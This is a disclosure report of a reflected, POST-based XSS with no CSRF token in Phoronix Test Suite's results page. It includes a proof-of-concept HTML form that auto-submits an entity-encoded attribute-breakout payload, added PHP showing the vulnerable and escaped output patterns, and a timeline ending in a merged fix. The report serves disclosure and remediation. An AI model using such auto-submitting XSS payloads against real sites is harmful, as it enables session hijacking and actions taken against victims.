Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Feb 9th 2022


Description

Hi, I found a reflected XSS vulnerability (POST-based XSS + no CSRF token) in Phoronix Test Suite, Results tab.

Proof of Concept

Install a local instance of phoronix
Create a search results form like this:
// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022&#45;02&#45;08&quot;onfocus&#61;&quot;confirm&#40;origin&#41;&quot;autofocus&#61;&quot;" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
//
Send it to the victim. The victim clicks on the link, resulting in reflected cross-site scripting.

Impact

This vulnerability is capable of Reflected XSS
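
The PoC's `time_start` value works because a double quote ends the `value` attribute it is reflected into. The following is an added example, not code from phoronix-test-suite or from the report: it shows that output pattern beside a hardened form that validates the date and encodes it for the attribute context. All function names are hypothetical, and the sample input is the decoded `time_start` value from the form above.

```php
<?php
// Added example: hypothetical helpers, not the project's own code.

// Vulnerable pattern: the POSTed value is concatenated into a quoted
// attribute, so a double quote in the value closes the attribute and
// the rest is parsed as new attributes (onfocus, autofocus).
function render_date_input_unsafe(string $name, string $value): string
{
    return '<input type="date" name="' . $name . '" value="' . $value . '" />';
}

// Accept only a real calendar date in strict YYYY-MM-DD form.
// The round-trip comparison rejects trailing data, "2022-2-8" and
// overflowing dates such as "2022-02-31".
function parse_date_or_default(string $raw, string $default): string
{
    $d = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    if ($d === false || $d->format('Y-m-d') !== $raw) {
        return $default;
    }
    return $raw;
}

// Hardened pattern: validate first, then encode for the attribute
// context anyway, so the output stays safe if validation is relaxed later.
function esc_attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_date_input_safe(string $name, string $raw, string $default): string
{
    $value = parse_date_or_default($raw, $default);
    return '<input type="date" name="' . esc_attr($name)
        . '" value="' . esc_attr($value) . '" />';
}

// Sample input: the time_start value from the PoC form, entities decoded.
$posted = '2022-02-08"onfocus="confirm(origin)"autofocus="';

echo render_date_input_unsafe('time_start', $posted), PHP_EOL; // attribute breakout
echo render_date_input_safe('time_start', $posted, '2022-02-08'), PHP_EOL; // falls back to default
echo render_date_input_safe('time_start', '2022-02-09', '2022-02-08'), PHP_EOL; // valid date kept
```

Encoding closes the injection itself; the missing CSRF token noted in the report is a separate gap that lets a third-party page submit the form on the victim's behalf.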

We are processing your report and will contact the phoronix-test-suite team within 24 hours. 4 months ago
Andy modified the report
4 months ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back 4 months ago
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability 4 months ago
Andy has been awarded the disclosure bounty
The fix bounty is now up for grabs
phoronix-test-suite/phoronix-test-suite maintainer confirmed that a fix has been merged on 1eac92 4 months ago
The fix bounty has been dropped